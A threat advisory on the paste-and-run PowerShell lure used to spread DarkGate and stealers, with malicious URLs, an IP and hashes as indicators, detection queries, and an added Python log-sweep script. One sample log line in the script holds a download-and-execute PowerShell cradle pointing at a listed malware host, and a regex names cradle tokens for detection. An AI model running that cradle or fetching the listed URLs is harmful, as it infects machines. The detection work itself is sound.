From Clipboard to Compromise: A PowerShell Self-Pwn

    Date: 07/09/2024

    Severity: Medium

    Summary

    Proofpoint has observed a rise in a social engineering technique in which users are tricked into copying and pasting a malicious PowerShell script themselves, resulting in malware infections. Threat actors including TA571 use the method to distribute DarkGate, Matanbuchus, NetSupport and data stealers. Whether delivered via malspam or web browser injections, the lure displays a fake error message and instructs the user to run the copied script in PowerShell or the Windows Run dialog box, so the victim, not an exploit, launches the malware.

    Indicators of Compromise (IOC) List

    URL/Domain

    http://languangjob.com/pandstvx

    http://mylittlecabbage.net/qhsddxna

    http://mylittlecabbage.net/xcdttafq

    https://cdn3535.shop/1.zip

    https://jenniferwelsh.com/header.png

    https://kostumn1.ilabserver.com/1.zip

    https://lashakhazhalia86dancer.com/c.txt

    https://oazevents.com/loader.html

    https://rtattack.baqebei1.online/df/tt

    ra-silberkuhl.com

    IP Address

    91.222.173.113

    Hash

    07e0c15adc6fcf6096dd5b0b03c20145171c00afe14100468f18f01876457c80

    11909c0262563f29d28312baffb7ff027f113512c5a76bab7c5870f348ff778f

    9701fec71e5bbec912f69c8ed63ffb6dba21b9cca7e67da5d60a72139c1795d1

    Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection

    URL/Domain

    userdomainname IN ("languangjob.com" , "mylittlecabbage.net" , "cdn3535.shop" , "jenniferwelsh.com" , "kostumn1.ilabserver.com" , "lashakhazhalia86dancer.com" , "oazevents.com" , "rtattack.baqebei1.online" , "ra-silberkuhl.com") or url IN ("http://languangjob.com/pandstvx" , "http://mylittlecabbage.net/qhsddxna" , "http://mylittlecabbage.net/xcdttafq" , "https://cdn3535.shop/1.zip" , "https://jenniferwelsh.com/header.png" , "https://kostumn1.ilabserver.com/1.zip" , "https://lashakhazhalia86dancer.com/c.txt" , "https://oazevents.com/loader.html" , "https://rtattack.baqebei1.online/df/tt")

    IP Address

    dstipaddress IN ("91.222.173.113") or ipaddress IN ("91.222.173.113") or publicipaddress IN ("91.222.173.113") or srcipaddress IN ("91.222.173.113")

    Hash

    sha256hash IN ("07e0c15adc6fcf6096dd5b0b03c20145171c00afe14100468f18f01876457c80" , "11909c0262563f29d28312baffb7ff027f113512c5a76bab7c5870f348ff778f" , "9701fec71e5bbec912f69c8ed63ffb6dba21b9cca7e67da5d60a72139c1795d1")
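    The following script is an added example, not Gurucul's or Proofpoint's code. It mirrors the three TDIR queries above (domain/URL, IP address, SHA-256) as an offline sweep over exported log lines, extends the URL check to process command lines, and adds one heuristic for the technique described in the summary: powershell.exe started by explorer.exe (the parent of anything typed into the Run dialog) with a download-cradle token on the command line. The key=value log format, the field names beyond those in the queries (host, image, parentimage, cmdline, path), the cradle token list and every sample line are constructed for this example; tune the heuristic before using it in production, since explorer.exe launches plenty of legitimate PowerShell.

```python
"""Offline IOC sweep for the indicators on this page (added example, constructed data)."""
import re
from urllib.parse import urlparse

# Indicators copied from the IOC list above.
IOC_URLS = {
    "http://languangjob.com/pandstvx",
    "http://mylittlecabbage.net/qhsddxna",
    "http://mylittlecabbage.net/xcdttafq",
    "https://cdn3535.shop/1.zip",
    "https://jenniferwelsh.com/header.png",
    "https://kostumn1.ilabserver.com/1.zip",
    "https://lashakhazhalia86dancer.com/c.txt",
    "https://oazevents.com/loader.html",
    "https://rtattack.baqebei1.online/df/tt",
}
IOC_DOMAINS = {urlparse(u).hostname for u in IOC_URLS} | {"ra-silberkuhl.com"}
IOC_IPS = {"91.222.173.113"}
IOC_SHA256 = {
    "07e0c15adc6fcf6096dd5b0b03c20145171c00afe14100468f18f01876457c80",
    "11909c0262563f29d28312baffb7ff027f113512c5a76bab7c5870f348ff778f",
    "9701fec71e5bbec912f69c8ed63ffb6dba21b9cca7e67da5d60a72139c1795d1",
}
# IP field names follow the TDIR query on this page.
IP_FIELDS = ("dstipaddress", "ipaddress", "publicipaddress", "srcipaddress")

KV_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')   # key=value, value may be "quoted"
URL_RE = re.compile(r"""https?://[^\s'")]+""")          # URLs inside a command line
# Assumed cradle tokens for a paste-and-run PowerShell one-liner; adjust per environment.
CRADLE_RE = re.compile(r"\b(iex|invoke-expression|iwr|invoke-webrequest|downloadstring|frombase64string)\b")


def parse_kv(line):
    """Parse one key=value log line into a dict with lower-cased keys."""
    event = {}
    for key, value in KV_RE.findall(line):
        if len(value) >= 2 and value[0] == '"' and value[-1] == '"':
            value = value[1:-1]
        event[key.lower()] = value
    return event


def match_iocs(event):
    """Return the indicator hits for one parsed event, in a stable order, without duplicates."""
    hits = []

    def add(hit):
        if hit not in hits:
            hits.append(hit)

    domain = event.get("userdomainname", "").lower()
    if domain in IOC_DOMAINS:
        add(f"domain:{domain}")
    urls = [event["url"]] if "url" in event else []
    urls += URL_RE.findall(event.get("cmdline", ""))   # also catch URLs pasted into a command line
    for url in urls:
        if url.lower() in IOC_URLS:
            add(f"url:{url.lower()}")
        host = (urlparse(url).hostname or "").lower()
        if host in IOC_DOMAINS:
            add(f"domain:{host}")
    for field in IP_FIELDS:
        if event.get(field) in IOC_IPS:
            add(f"ip:{event[field]}")
    if event.get("sha256hash", "").lower() in IOC_SHA256:
        add(f"sha256:{event['sha256hash'].lower()}")
    return hits


def pasted_cradle_from_explorer(event):
    """Heuristic for the self-pwn: explorer.exe -> powershell.exe with a cradle token on the command line."""
    image = event.get("image", "").lower()
    parent = event.get("parentimage", "").lower()
    if not image.endswith(("powershell.exe", "pwsh.exe")) or not parent.endswith("explorer.exe"):
        return False
    return CRADLE_RE.search(event.get("cmdline", "").lower()) is not None


def scan(lines):
    """Return (line_index, hits) for every line that matches an IOC or the technique heuristic."""
    results = []
    for i, line in enumerate(lines):
        event = parse_kv(line)
        hits = match_iocs(event)
        if pasted_cradle_from_explorer(event):
            hits.append("technique:powershell-cradle-from-explorer")
        if hits:
            results.append((i, hits))
    return results


# Constructed sample events (proxy, firewall, EDR process, EDR file, two benign lines).
SAMPLE_LOGS = [
    "ts=2024-07-09T10:01:02Z srcipaddress=10.0.0.15 userdomainname=cdn3535.shop url=https://cdn3535.shop/1.zip action=allowed",
    "ts=2024-07-09T10:01:05Z srcipaddress=10.0.0.15 dstipaddress=91.222.173.113 dstport=443 action=allowed",
    'ts=2024-07-09T10:00:58Z host=WS01 parentimage=C:\\Windows\\explorer.exe image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe cmdline="powershell -w hidden -c iex (iwr https://lashakhazhalia86dancer.com/c.txt)"',
    "ts=2024-07-09T10:01:10Z host=WS01 path=C:\\Users\\Public\\sample.bin sha256hash=07e0c15adc6fcf6096dd5b0b03c20145171c00afe14100468f18f01876457c80",
    "ts=2024-07-09T10:02:00Z srcipaddress=10.0.0.15 userdomainname=example.com url=https://example.com/ action=allowed",
    'ts=2024-07-09T10:03:00Z host=WS01 parentimage=C:\\Windows\\explorer.exe image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe cmdline="powershell -File C:\\Scripts\\backup.ps1"',
]

if __name__ == "__main__":
    for index, hits in scan(SAMPLE_LOGS):
        print(f"line {index}: {', '.join(hits)}")
```

    Run it as-is to see the four matching sample lines; to sweep real exports, feed `scan()` the lines of a proxy, firewall or EDR dump in the same key=value shape, or adapt `parse_kv()` to the export format. The last sample line shows why the technique heuristic requires a cradle token and not merely an explorer.exe parent.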

    Reference:

    https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn

